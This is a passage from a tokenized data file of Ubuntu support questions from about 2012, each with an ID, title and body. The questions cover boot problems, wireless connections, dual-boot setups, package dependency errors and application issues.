00:1f.3 smbus : intel corporation 6 series chipset family smbus controller ( rev 05 ) 02:00.0 ethernet controller : atheros communications ar8152 v2.0 fast ethernet ( rev c1 ) 07:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev ff ) sudo lshw -c network *-network description : ethernet interface product : ar8152 v2.0 fast ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : c1 serial : 04:7d:7b:4e:59:6c capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:41 memory:93400000-9343ffff ioport:3000 ( size=128 ) lsmod module size used by ppp_deflate 12838 0 zlib_deflate 26594 1 ppp_deflate bsd_comp 12777 0 ppp_async 17308 1 crc_ccitt 12595 1 ppp_async option 21045 2 usb_wwan 19711 1 option usbserial 37116 7 option , usb_wwan parport_pc 32111 0 ppdev 12849 0 snd_hda_codec_hdmi 27479 1 snd_hda_codec_realtek 255820 1 binfmt_misc 13213 1 joydev 17322 0 ath9k 103633 0 snd_hda_intel 24140 4 snd_hda_codec 90901 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13274 1 snd_hda_codec snd_pcm 80244 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25269 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51291 2 snd_seq_midi , snd_seq_midi_event sparse_keymap 13666 0 i915 450944 3 mac80211 257001 1 ath9k snd_timer 28659 2 snd_pcm , snd_seq snd_seq_device 14110 3 snd_seq_midi , snd_rawmidi , snd_seq uvcvideo 66851 0 ath9k_common 13611 1 ath9k ath9k_hw 300328 2 ath9k , ath9k_common ath 19141 2 ath9k , ath9k_hw videodev 75143 1 uvcvideo drm_kms_helper 40745 1 i915 cfg80211 156212 3 ath9k , mac80211 , ath snd 55295 17 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 73312 0 drm 180037 4 i915 , drm_kms_helper soundcore 12600 1 snd serio_raw 12990 0 snd_page_alloc 14073 2 snd_hda_intel , snd_pcm i2c_algo_bit 13184 1 i915 video 18951 1 i915 lp 13349 0 parport 36746 3 parport_pc , ppdev , lp usbhid 41704 0 hid 77084 1 usbhid usb_storage 43946 0 uas 17676 0 ahci 21591 3 libahci 25548 1 ahci atl1c 36237 0 no result for rfkill list all .
223321	lightspark does n't work in firefox	lightspark does n't work in firefox , because the file i downloaded ( newest version , ) `` appears to be damaged . '' in the firefox-menu , you should be able to install it from a file.why does it `` appear to be damaged '' and what can i do to `` fix '' it ? are there any other methods to make firefox recognize lightspark , wich i already have installed via terminal ?
223323	ca n't boot the live dvd in my pc ( uefi , windows 8 dual boot )	i have a dell xps 8500 pc , with windows 8 , and uefi , i want a dual boot with windows 8 and ubuntu 12.10 ( 64 bits ) .. then i was reading the next tutorial : http : //help.ubuntu.com/community/uefi but just ca n't boot any live dvd , i have downloaded 3 times the ubuntu live dvd ( in two differents places ) , and one time the ubuntu secure remix live dvd ( both in 64 bits ) . my bios setup is the next ( screenshot ) : when booting my pc with the live dvd ( only in the normal ubuntu live dvd ) show this screens : first : after : with the ubuntu secure remix never boot ( as if you never insert the dvd ) ... choose any option of the menu appear the next screen with the next message error : error : failure reading sector 0x5b500 from cd0 ( always exactly the same message with the three dvd copies ) press any key to continue after that change the screen , and show a kernel panic message : kernel panic : not syncing : vfs : unable to mount root on unknow-block ( 0,0 ) i need the dual boot , help please ( i miss ubuntu )
223324	minecraft not working in ubuntu 12.04 lts - black screen ?	this is what i 've done exactly . i downloaded minecraft for linux from minecraft.net i tried running the file using both openjdk java 7 runtime and oracle java 7 runtime the file opened fine both times and i logged in as so then the screen went black and stayed that way . i do n't know what to do ?
223325	upgrade from ubuntu 12.04 to 12.10 with the iso on usb flash drive	how do i do an upgrade to 12.10 using the iso downloaded from the ubuntu web site ? i do not want to do a clean install as i do not want to loose my settings . i am afraid that clicking `` upgrade to 12.10 '' in update manager will upgrade the os and all the packages and that this will take all my monthly data from my contract which is just 3gig a month .
223326	kubuntu 12.10 not seeing usb drive formatted ntfs	i have a 160gb hard disk ( model wd1600bevt ) that i 've installed in a usb casing . i formatted it as ntfs in windows 7 . a few days ago , i have installed kubuntu 12.10 on my computer at home , but when i connect my usb ntfs drive , it does n't detect it : `` sudo fdisk -l '' does n't see it at all . what should i do to mount it ? can i make it automount when plugged ? thanks !
223327	sound in a audio conversation on skype ?	i just instaled ubuntu and downloaded skype 4.0 . skype is working fine except there is no sound coming from my speakers or headphones . when i go to options : sounds i see a bounch of choices for speakers but none of them works . i get microphone to work , btw .
223329	can´t mount win8 partition in ubuntu 12.04	after installing win8 and then used wimi to install ubuntu . the operative systems work fine , now to my trouble . i can´t mount win8 partition in ubuntu 12.04 . is this a known error ? how can i fix this ?
223330	how to debug maasserver with django runserver	in order to debug maas , i ran the following command : $ cd /usr/share/pyshared/maas $ sudo python manage.py runserver ( ip ) :8888 -- settings=maas.settings after that , i typed the url 'http : // ( ip ) :8888/maas/ ' in a firefox browser . then the following error is shown : a server error occurred . please contact the administrator . it seems that server did not find homepage 404.html . when i check with url http : // ( ip ) :8000 ( not 8888 ) /maas/ ' , number of nodes are increased 2 times when manager.py runserver is running . could you let me know how to debug maas/maasserver using pdb and django runserver ? thanks in advance ,
223334	why do i see a `` sighup or sigterma : '' error while trying to pass my password to sudo using echo and `` | '' ?	edit : echo and sudo used together as shown below can have unexpected consequences . please avoid such usage as far as possible . i 'm on lubuntu 12.10 fully updated . i know that what i 'm asking could be a security risk but i would still like to understand what 's happening . i can get the following aliases to work : fast='echo `` mypassword '' | sudo -s apt-fast update & & sudo apt-fast upgrade' nm='echo `` mypassword '' | sudo -s service network-manager restart' aalog='echo `` mypassword '' | sudo -s aa-logprof' reloadsm='echo `` mypassword '' | sudo -s apparmor_parser -r /etc/apparmor.d/usr.local.seamonkey.seamonkey' reloadgc='echo `` mypassword '' | sudo -s apparmor_parser -r /etc/apparmor.d/opt.google.chrome.google-chrome' but when i try this alias pua='echo `` mypassword '' | sudo -s nano /etc/privoxy/user.action' i see this : [ 12:32 pm ] ~ $ pua received sighup or sigterma : [ 12:32 pm ] ~ $ can someone please explain why this happens and if there 's a way to fix the error-giving alias ? ( i do n't want to do anything involving sudoers . )
223340	laptop boots at low color depth , close lid and reopen and voila -- normal ?	i boot the computer and the color depth is low in the sense that gradients do n't look impressive as you can see banding in them . that is they do n't appear to be dithered . i know this is a sign of low bit depth . i close the laptop lid and reopen and voila ! now it 's normal ? laptop : macbook pro 2012 ( non retina ) i7 2.9 ghz 8gb 1600 ddr3 intel 4000 gpu
223341	install alongside windows or something else - which should i use ?	i have old notebook with bios ( not efi ) installed with windows 8 rtm , want to install ubuntu 12.10 by booting to a livecd . doing some research , i found method either to choose something else or install alongside ... which method should i use ?
223342	debuild -s in cronjob : how to avoid interactive gpg	i would like to build and submit a package to a launchpad ubuntu reposiory of mine in a nightly cronjob . to this end , i 'll have to debuild -s the package which by default requires human interaction since the gpg key used for signing is protected by a password . the cronjob then also fails with an error message of the type can not open /dev/tty which gpg typically uses for the password challenge . how would i have to set up the system to work around such issues ?
223351	stuck in violet screen or black screen with dash	since i 've installed ubuntu 12.04 i have this problem ( on mint 13 i also had this problem ) now i have ubuntu 12.10 updated and windows 7 with it . when i go to windows everything works fine but some times suddenly if i choose ubuntu , it will stuck in violet screen . even the login screen wont come and i should press and hold the power button to reset my laptop i have to do this for 3 or 4 times . after reseting and choosing ubuntu again a black screen come and there is a dash in it and nothing else . i 'm woried about my lap top . if i reset it again i 'm afraid it could get serious problems . my laptop is hp probook 4520s 1gb swap space .
223353	can not make a wireless connection with new isp	i decided to write because i am having difficulty establishing a connection with one of my laptops . which is partitioned . the side that runs ubuntu 10.04 does not connect with the wireless router . the other side , running windows xp , connects fine . two other laptops ( running windows ) and two hard wired computers ( one mac and one running ubuntu 10.04 ) are working with good speeds . it was after switching my internet service provider , that i noticed with this one laptop , the connection was not working . it still works on the windows side and with qwest , but i want to stop using qwest and go with my new isp ( comcast ) . nothing has changed on any of the settings on any computer , including the laptops . we ran an ethernet cable directly to the wireless router from the laptop with an immediate connection running the linux side of that laptop . that tells me that the wireless router is functioning ; wellâśthe other laptops function also showing me that the router is not the issue . here again is my network/computer configuration : one macintosh running os 10.4 connected via ethernet - works fine two laptop pcs running windows wireless connections - both connect just fine one pc running ubuntu 10.04 connected via ethernet - connecting perfectly one laptop partitioned , one side running windows - wireless connection works . the other partition running ubuntu 10.04 , does not connect wireless , but does connect via ethernet . this is all running through a netgear wireless router . everything worked perfectly when our isp was qwest ( now called centurylink ) , but now that we are using comcast the one partition on the laptop using ubuntu does not connect . i have tried deleting all of the auto network connections and reconnecting , changing my router security settings from wpa/wpa2 to wep and back , rebooting the router and modem and other stuff i ca n't remember . the only thing i have n't tried was trying to connect using terminal.all of the available neighborhood wireless networks show up . sorry for any redundancy , i just wanted to make sure i got all the info . any help anyone can give would be appreciated . thanks !
223355	where does caja file manager mount smb shares ?	i 'm running on ubuntu 12.10 with caja installed . for nautilus , the mount point for shared file is ~/.gvfs , any idea where it 's stored for caja or other file managers ?
223356	does ubuntu need anti-malware ?	i 'm new to ubuntu ( 12.10 ) , does it need anti-malware and what is the best anti-malware for ubuntu ? i 'm asking , because unlike windows , linux is not as often the target of hackers since linux users are more tech savvy , 99 % of the time . linux are not attacked as frequent i believe since it does not have a huge user community like windows has .
223358	xubuntu fails to stay awake when the machine is under load	i have the following problem with a fresh install of xubuntu 12.04 : i set up power management options so as to send the machine to sleep after it 's been idle for a while . my intention was to have it finish some lengthy numbercrunching and then fall asleep late at night when nobody 's present to shut it down . what actually happened , however , is that the machine goes to sleep whenever the desktop session has been idle for the specified amount of time , and it does not seem to care at all about cpu load , and i had to disable sleep altogether . is there any way to fix this ?
223359	unable to access software center	when i 'm trying to go to software center for an application it says : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package vlc-nox
223362	prioritizing wlan over lan connection	i 'm using my lan connection to work with a peripheral device , and i would like to use my wlan connection for internet access . the problem is that ubuntu considers lan connection as priority , and does n't consider to use the wlan gateway . network manager does n't even allow me to delete the lan gateway . i have read a lot and known about modifying metrics and other complex methods , but i would like to have a fast and easy way to do this . any idea ?
223371	how does landscape calculate memory usage ?	i 'm trying to debug an oom situation in an ubuntu 12.04 server , and looking at the memory graphs in landscape , i noticed that there was n't any serious memory usage spike . then i looked at the output of the free command and i was n't quite sure how both memory usage results relate to each other . here 's landscape 's output on the server : $ landscape-sysinfo system load : 0.0 processes : 93 usage of / : 5.6 % of 19.48gb users logged in : 1 memory usage : 26 % ip address for eth0 : - swap usage : 2 % then i ran the free command and i get : $ free -m total used free shared buffers cached mem : 486 381 105 0 4 165 -/+ buffers/cache : 212 274 swap : 255 7 248 i can understand the 2 % swap usage , but where does the 26 % memory usage come from ?
223376	itunes library.itl can not be read beacause it was created by a newer version	i have installed itunes 10 by wine on ubuntu 12.10 and removed it . i installed itunes 7 by playonlinux . when i trying to start the application , it shows itunes library.itl can not be read because it was created by a newer version . how can i fix it ?
223377	problems with booting ubuntu after connecting new monitor - screen stuck at purple with strip	i have an old dell vostro 1520 with a nvidia grapics card . i have a windows/ubuntu dual boot . i recently tried to connect a new lenovo external screen . upon connection that laptop screen went crazy , so i rebooted the computer . after that , when i try to boot ubuntu , i 'm stuck at the purple screen with the colored stripes , whether i boot with or without the external lenovo screen connected . i can still boot fine in windows . i tried holding shift while booting linux , and changing 'quiet splash ' to 'no splash ' , which does n't change anything . i also tried nomodeset , which leads to the screen being stuck at the purple screen , without the strips . interestingly after having a failed boot in ubuntu with the lenovo screen connected , if i boot with windows afterwards , only the external screen is recognized , and is now called 'standard screen for laptop' any help or links to help will be greatly appreciated !
223379	after upgrading to kubuntu 12.10 , machine boots directly to memtest86	i have upgraded a virtual machine running kubuntu 12.04 to 12.10 . after the upgrade completed , i can no longer boot into the os . after post , i see three `` error : file not found . '' lines , and memtest86+ starts up . i can only assume that the upgrade deleted all kernel images where the installed bootloader looked for them . luckily this was in a vm and i saved a snapshot before beginning the upgrade , however i would still need to know how to prevent the distribution upgrade from breaking the system again . edit : my /boot/grub/grub.cfg before the upgrade .
223381	error in using gparted to add unallocated space	i 'm trying to add unallocated space to my ubuntu partition which is inside an extended partition . i get this error : gparted 0.12.1 -- enable-libparted-dmraid libparted 2.3 move /dev/sda3 to the left and grow it from 93.31 gib to 219.75 gib 00:00:00 ( error ) calibrate /dev/sda3 00:00:00 ( success ) path : /dev/sda3 start : 292,704,254 end : 488,394,751 size : 195,690,498 ( 93.31 gib ) move partition to the left and grow it from 93.31 gib to 219.75 gib 00:00:00 ( error ) old start : 292,704,254 old end : 488,394,751 old size : 195,690,498 ( 93.31 gib ) requested start : 27,545,600 requested end : 488,392,703 requested size : 460,847,104 ( 219.75 gib ) libparted messages ( info ) unable to satisfy all constraints on the partition . ca n't have overlapping partitions . ========================================
223387	remove tty0 and mv boot log to serial console	i would like remove tty0 console . i 'm using ubuntu in embedded system . i want remove any logs that show on display ( tty0 ) . somebody can help me ?
223388	ubuntu usb stick not detected in windows	i burnt the usb stick with the ubuntu iso , and can readily install unbuntu with that pendrive . but when i plug it in windows , windows does not detect it . can i make windows recognize it .
223389	i could not install wine due to eula message	i was trying to install picasa on ubuntu 12.04 and first had to install wine which came up with a eula that i could not see how to agree to . when trying to install picasa from the terminal i got the following message : ian @ ian-dimension-8100 : ~ $ wine ~/picasa39-setup.exe the program 'wine ' is currently not installed . you can install it by typing : sudo apt-get install wine1.4-i386 ian @ ian-dimension-8100 : ~ $ sudo apt-get install wine1.4-i386 [ sudo ] password for ian : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how to i overcome this problem ? the following are the instructions i was following : open a terminal by pressing ctl+alt+t or search terminal in dash , then install wine and winetricks using below command sudo apt-get install wine winetricks download picasa 3.9 from google use below command cd ~/ & & wget http : //dl.google.com/picasa/picasa39-setup.exe install picasa 3.9 via wine use below command wine ~/picasa39-setup.exe install ie6 via winetricks winearch=win32 wineprefix=~/.wine sh winetricks -q ie6 done , you launch picasa 3.9 by searching picasa in dash now
223392	how to recover the windows 7 partition in ubuntu 12.04	i had windows 7 and ubuntu 12.04 in my machine , and after trying to mount and unmount a sd card , my windows 7 `` has hidden him self '' , when i power on the computer , i can enter the grub and choose windows 7 ( loader ) ( on /dev/sda1 ) but , it says error : no such device : b6606771606736f1 . error : invalid signature . how can i recover my windows 7 ? when i do sudo fdisk -l it appearsthis disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xfeff8cfd device boot start end blocks id system /dev/sda1 * 2048 523655167 261826560 7 hpfs/ntfs/exfat /dev/sda2 523655168 1359239167 417792000 7 hpfs/ntfs/exfat /dev/sda3 1359241214 1465147391 52953089 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 1359241216 1448818687 44788736 83 linux /dev/sda6 1448820736 1465147391 8163328 82 linux swap / solaris disk /dev/sdb : 24.0 gb , 24015495168 bytes 255 heads , 63 sectors/track , 2919 cylinders , total 46905264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x74f02dea device boot start end blocks id system /dev/sdb1 * 2048 46901247 23449600 7 hpfs/ntfs/exfat help please ...
223393	why partition is not mounted after installation of ubuntu 12.10 in place of windows 7 ?	i have installed ubuntu 12.10 in place of windows 7 . now i ca n't see my personal data . problem is that i 'm getting error `` can not mount file '' while trying to access hard disk under path ( go-computer ) please provide your suggestions . thanks
223395	synergy keyboard layout	i have an issue with synergy . i do really love how it works but when i leave my host pc with non-english layout i ca n't type anything on the secondary pc . my host pc is windows 7 . i have english and russian keyboard layouts . my secondary pc is ubuntu 12.10 . i also have english and russian keyboard layouts there . the keyboard and mouse are connected to the host pc ( windows 7 ) . when the mouse cursor leaves the host pc with russian layout the keyboard does n't respond in the secondary pc . i ca n't type and ca n't change the layout . the only way is to return the mouse cursor to the host pc , switch keyboard layout to english and go back to the secondary pc . it 's kind of annoying . ps : i updated to the latest version ( 1.4.10 ) of synergy with the same result . so , is there way to fix this ? thanks in advance .
223397	regarding offline installe 12.10	i m a windows user i want to remove it and install a fresh ubuntu 12.10 version on it so i'v got some questions regarding it q1.what is a step-by-step procedure for offline download ? i read it somewhere that i requires some stuff from net . q2.what if i download .iso file from official site n install it offline will it require some other os 's stuff ? q3 . keryx or apt-offline-gui ? which is better q4 . guides regarding keryx & apt-offline thank you in advance
223399	how to get icons in pcmanfm ubuntu 12.10 with only fluxbox	i installed ubuntu 12.10 via mini-iso , after that i installed xinit , xorg , fluxbox , xterm , pcmanfm , chromium-browser , lxappearance . there is for now one set of icons , in lxappearance i chose the icon set and applied but they do n't show up in pcmanfm , there i see only text . how do i get pcmanfm to show foldericons ?
223401	clementine and other qt-based apps crash when click file manager window	i have a problem while play music on clementine on ubuntu 12.04 64 bit . it is crash when i click the file manager window on the right side . anyone has idea ? basically this happens with a lot of qt-based apps ( qtractor , lmms , ... )
223406	problem with uninstalling virtualbox	i am using ubuntu 12.10 . i downloaded from virtualbox.org the virtualbox package 4.2.4*.deb . i wanted to install it with dpkg -i and terminal requested me to use command alien instead . so i did alien < package > then dpkg -i < package > and used virtualbox . now i want to uninstall virtualbox ( because something went wrong ) because it was not installed with sudo apt-get install . i want to use command dpkg -e < package > or dpkg -- purge < package > but this ends with report file or directory not found then sudo dpkg -l | grep virtualbox reports : ii virtualbox-4.2 4.2.4-81684~ubuntu~quantal amd64 oracle vm virtualbox rc virtualbox-qt 4.1.18-dfsg-1ubuntu1.1 amd64 x86 virtualization solution - qt based user interface what should i do next ?
223407	kernel panic after ubuntu update .	i updated ubuntu and when i rebooted , it wo n't boot . i get a black screen with the error kernel panic - not syncing : attempted to kill init i use ubuntu 12.04 , my linux-image is 3.2.0-33-generic-pae , recovery mode goes into the same error ( kernel panic - not syncing : attempted to kill init ) and ubuntu upgraded my previous linux versions as well and they all go into that same error .
223409	installing package on different ubuntu version	i want to install this package on quantal but it only seems to have oneiric and precise versions . so apt-get update fails when fetching the package 's ppa ( it does n't have a quantal version ) . i think the precise version will probably run fine on quantal , though . is there a way i can manually get the deb and install it with dpkg at my own risk ? or some other way to bypass the `` version check '' .
223411	how can i test with internet explorer while on my ubuntu ?	i want to test my apps in ie7 , ie8 and ie9 how can i do this on ubuntu ?
223414	'unmet dependencies ' while trying to install python-scipy on ubuntu 12.10	when doing sudo apt-get install python-scipy on an ubuntu 12.10 machine , i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python-scipy : depends : python-numpy ( > = 1:1.6.1 ) but it is not going to be installed depends : python-numpy-abi9 depends : libgfortran3 ( > = 4.6 ) but it is not going to be installed depends : liblapack3 but it is not going to be installed or liblapack.so.3 or libatlas3-base but it is not going to be installed e : unable to correct problems , you have held broken packages . do you have any idea on how to solve this ? thanks
223417	hp probook 4540s is overheating while using ubuntu	i 'm using dual boot with windows 8 and ubuntu 12.04 . when i use windows 8 , everything works perfectly but when i use ubuntu 12.04 my cpu heats up too quickly . why does it happen only in ubuntu and not in windows and what can i do to prevent it . thanks ! my computer : hp probook 4540s
223420	can not get java to work in firefox	in firefox 17 on ubuntu 12.04 , i can not get the java verification applet to work ( needless to say i can not get any java applications on the browser working ) . i already tried uninstalling and re-installing the afaik necessary components ( screenshot 1 , screenshot 2 ) ( before , i had java 6 and 7 installed . i already tried leaving only java 7 , now i am back to leaving only java 6 ) , but i can not get it to work . how do i get jre up and running in firefox ? update : i had so much trouble with java in firefox quitting working after upgrades etc that i gave up firefox entirely ( my main purpose of using this ubuntu machine is to safely run java apps away from my main computer ) . i now run opera and never had any problems again - it comes with java and it just works .
223422	gksudo keeps asking for my password when using a custom unity launcher	i wrote a custom .desktop file that contains an exec line # ! /usr/bin/env xdg-open [ desktop entry ] ( ... ) exec=gksudo /my/path/to/bash_script.sh ( ... ) this script launches some zenity calls . then i made this desktop file to appear in unity-2d launcher side bar . my problem is every time i use this launcher shortcut it keeps asking for my password ... while the expected behavior is to ask once , then remember for some time . it was acting like that in gnome/lucid so something has changed but what ? ( i also tried '-k ' option but does n't change my problem ) if try that command line from a terminal ( as my regular user ) gksudo /my/path/to/bash_script.sh it works like expected ( =same behavior as in lucid ) : asks the password only on the first launch . what am i missing here ?
223424	no windows7 entry on grub2 's menu after installing ubuntu	i installed ubuntu 12.04 and after installation no windows 7 entry shown . boot-repair output : http : //paste.ubuntu.com/1396793/
223429	how can i get sikuli-ide to work ?	i installed sikuli-ide with sudo apt-get install sikuli-ide everything was fine until i tried to start it from the terminal . i typed sikuli-ide but the only response i got was [ info ] locale : en_us the application was not started , furthermore there is no desktop file and sikuli-ide does not show up in dash home . i guess there is something wrong with the package . i run ubuntu 12.10 64bit . i tried to install it ( sikuli-x-1.0rc3 ( r905 ) -linux-x86_64.zip ) from their page , now the ide starts , but when i try to execute a simple script i get the following error : [ error ] stopped [ error ] an error occurs at line 1 [ error ] error message : traceback ( most recent call last ) : file `` '' , line 1 , in file `` /home/ayckoster/opt/sikuli-ide/sikuli-script.jar/lib/sikuli/__init__.py '' , line 3 , in file `` /home/ayckoster/opt/sikuli-ide/sikuli-script.jar/lib/sikuli/sikuli.py '' , line 22 , in java.lang.unsatisfiedlinkerror : /home/ayckoster/opt/sikuli-ide/libs/libvisionproxy.so : libml.so.2.1 : can not open shared object file : no such file or directory at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1935 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1860 ) at java.lang.classloader.loadlibrary ( classloader.java:1821 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at com.wapmx.nativeutils.jniloader.nativeloader.loadlibrary ( nativeloader.java:44 ) at org.sikuli.script.finder . ( finder.java:33 ) at java.lang.class.forname0 ( native method ) at java.lang . class.forname ( class.java:264 ) at org.python.core.py.loadandinitclass ( py.java:895 ) at org.python.core.py.findclassinternal ( py.java:830 ) at org.python.core.py.findclassex ( py.java:881 ) at org.python.core.packagecache.syspackagemanager.findclass ( syspackagemanager.java:133 ) at org.python.core.packagecache.packagemanager.findclass ( packagemanager.java:28 ) at org.python.core.packagecache.syspackagemanager.findclass ( syspackagemanager.java:122 ) at org.python.core.pyjavapackage.__findattr_ex__ ( pyjavapackage.java:137 ) at org.python.core.pyobject.__findattr__ ( pyobject.java:863 ) at org.python.core.imp.import_name ( imp.java:849 ) at org.python.core.imp.importname ( imp.java:884 ) at org.python.core.importfunction.__call__ ( __builtin__.java:1220 ) at org.python.core.pyobject.__call__ ( pyobject.java:357 ) at org.python.core.__builtin__.__import__ ( __builtin__.java:1173 ) at org.python.core.imp.importfromas ( imp.java:978 ) at org.python.core.imp.importfrom ( imp.java:954 ) at sikuli.sikuli $ py.f $ 0 ( /home/ayckoster/opt/sikuli-ide/siku li-script.jar/lib/sikuli/sikuli.py:211 ) at sikuli.sikuli $ py.call_function ( /home/ayckoster/opt/sikuli-ide/sikuli-script.jar/lib/sikuli/sikuli.py ) at org.python.core.pytablecode.call ( pytablecode.java:165 ) at org.python.core.pycode.call ( pycode.java:18 ) at org.python.core.imp.createfromcode ( imp.java:386 ) at org.python.core.util.importer.importer_load_module ( importer.java:109 ) at org.python.modules.zipimport.zipimporter.zipimporter_load_module ( zipimporter.java:161 ) at org.python.modules.zipimport.zipimporter $ zipimporter_load_module_exposer.__call__ ( unknown source ) at org.python.core.pybuiltinmethodnarrow.__call__ ( pybuiltinmethodnarrow.java:47 ) at org.python.core.imp.loadfromloader ( imp.java:513 ) at org.python.core.imp.find_module ( imp.java:467 ) at org.python.core.pymodule.impattr ( pymodule.java:100 ) at org.python.core.imp.import_next ( imp.java:715 ) at org.python.core.imp.import_name ( imp.java:824 ) at org.python.core.imp.importname ( imp.java:884 ) at org.python.core.importfunction.__call__ ( __builtin__.java:1220 ) at org.python.core.pyobject.__call__ ( pyobject.java:357 ) at org.python.core.__builtin__.__import__ ( __builtin__.java:1173 ) at org.python.core.imp.importall ( imp.java:998 ) at sikuli $ py.f $ 0 ( /home/ayckoster/opt/sikuli-ide/sikuli-script.jar/lib/sikuli/__init__.py:3 ) at sikuli $ py.call_function ( /home/ayckoster/opt/sikuli-ide/sikuli-script.jar/lib/sikuli/__init__.py ) at org.python.core.pytablecode.call ( pytablecode.java:165 ) at org.python.core.pycode.call ( pycode.java:18 ) at org.python.core.imp.createfromcode ( imp.java:386 ) at org.python.core.util.importer.importer_load_module ( importer.java:109 ) at org.python.modules.zipimport.zipimporter.zipimporter_load_module ( zipimporter.java:161 ) at org.python.modules.zipimport.zipimporter $ zipimporter_load_module_exposer.__call__ ( unknown source ) at org.python.core.pybuiltinmethodnarrow.__call__ ( pybuiltinmethodnarrow.java:47 ) at org.python.core.imp.loadfromloader ( imp.java:513 ) at org.python.core.imp.find_module ( imp.java:467 ) at org.python.core.imp.import_next ( imp.java:713 ) at or g.python.core.imp.import_name ( imp.java:824 ) at org.python.core.imp.importname ( imp.java:884 ) at org.python.core.importfunction.__call__ ( __builtin__.java:1220 ) at org.python.core.pyobject.__call__ ( pyobject.java:357 ) at org.python.core.__builtin__.__import__ ( __builtin__.java:1173 ) at org.python.core.imp.importall ( imp.java:998 ) at org.python.pycode._pyx2.f $ 0 ( :1 ) at org.python.pycode._pyx2.call_function ( ) at org.python.core.pytablecode.call ( pytablecode.java:165 ) at org.python.core.pycode.call ( pycode.java:18 ) at org.python.core.py.runcode ( py.java:1261 ) at org.python.core.py.exec ( py.java:1305 ) at org.python.util.pythoninterpreter.exec ( pythoninterpreter.java:206 ) at org.sikuli.script.scriptrunner.runpython ( scriptrunner.java:61 ) at org.sikuli.ide.sikuliide $ buttonrun.runpython ( sikuliide.java:1572 ) at org.sikuli.ide.sikuliide $ buttonrun $ 1.run ( sikuliide.java:1677 ) java.lang.unsatisfiedlinkerror : java.lang.unsatisfiedlinkerror : /home/ayckoster/opt/sikuli-ide/libs/libvisionproxy.so : libml.so.2.1 : can not open shared object file : no such file or directory if i try to use the click ( ) method from the gui it fails . so i created my own click method and it look like this : this can not be executed and produces the error above .
223434	how to disable internet for a user on a system	i know about changing owners/permissions on particular programs/files , but how can i control which users have access to the nic or the power to create network sockets ?
223436	use a proxy which connects to the school proxy	how to get my computer use a proxy on my computer , which connects to the school proxy ? the reason i ask this , is because i need all programs on my computer , absolutely the whole system to go through the network , without having to use proxy authentication ? then i was thinking of a possibility to use a local proxy without authentication , to connect to the school proxy ( with all authentication details ) , and then be able to make the system go through it ? is that possible ? i 've heard some stories about using ip-tables to make a transparent proxy , but i have no idea how to do that , as i am pretty new at all this . so , details , explanations and suggestions about this are very welcome ! if you need more details , i 'll provide them !
223439	how system services are started in 12.10 ?	one thing that always confused me in ubuntu was how system services are started . i know that ubuntu uses upstart and supports sysv , but which one is used to start the services ? this matters when you want a `` manual '' start for a service . for example , on my system i have files for the following services either in /etc/init.d/ < service > ( sysv ) and /etc/init/ < service > .conf ( upstart ) : acpid , mysql , networking , qemu-kvm , ufw , libvirt-bin so if i want to disable mysql execution at startup , i must use the upstart way or the sysv way to disable it ? also , how can i tell which of those is really used to start a generic service ? edit the really doubt here is not how disable/enable services using sysv/upstart . what really confuses me is that some services seem to be defined ( and enabled ) in sysv and upstart at the same time . is there any precedence between them ( like if mysql is enabled in both launch it using sysv ) ? or can it be the case that one tool uses the other in background ?
223441	purpose of /run/lock/ ( empty except for ./whoopsie/ )	my /run/lock/ directory is empty except for ./whoopsie/ . i have understood /run/lock/ as a replacement for /var/lock/ but was surprised to find it entirely empty . is whoopsie meant as a deterrent from using this directory ? i did find other lock files under /run/ , though . most notably in /run/user/ < me > / . i would have expect per-users lock files in /run/lock/user/ and not in a separate directory . hoping for some clarification !
223444	how to set the tempreture at which the fan must speed up - laptop	i have hp probook 4530s and the fan speeds up at around 45c then when it reaches 35c slows down and repeats . in the interval between 35-45 it barely works and this results in very annoying speed up of the fan every 2 minutes . how can set a higher threshold at which it will speed up and how can i keep the tempreture between the two intervals stable ( i mean the fan will not turn off but keep a steady speed ) . thank you in advance .
223446	how do ubuntu updates appear on amazon ec2 ?	i have ubuntu 12.04 lts installed in amazon ec2 machine . sometimes when i ssh into the machine i see a notice asking me to update some packages . please see the screenshot image below my question how does updates notices appear on amazon ec2 ? if these updates are new how are they shipped from canonical to amazon server ?
223453	kodak esp c315 no longer works properly after upgrade to 12.04 lts	i have a kodak esp c315 printer which used to work perfectly on ubuntu 11.04 lts but , since i upgraded to 12.04 lts , the printer will no longer print from a browser . it prints local documents fine , but when i try to print something from a browser , it prints a blank page whereas , before , it would print the page from the browser fine . i have removed the printer driver completely and reinstalled the latest driver , but it has made no difference . i have tried from firefox and google chromium , but the printer wo n't print pages from either of them .
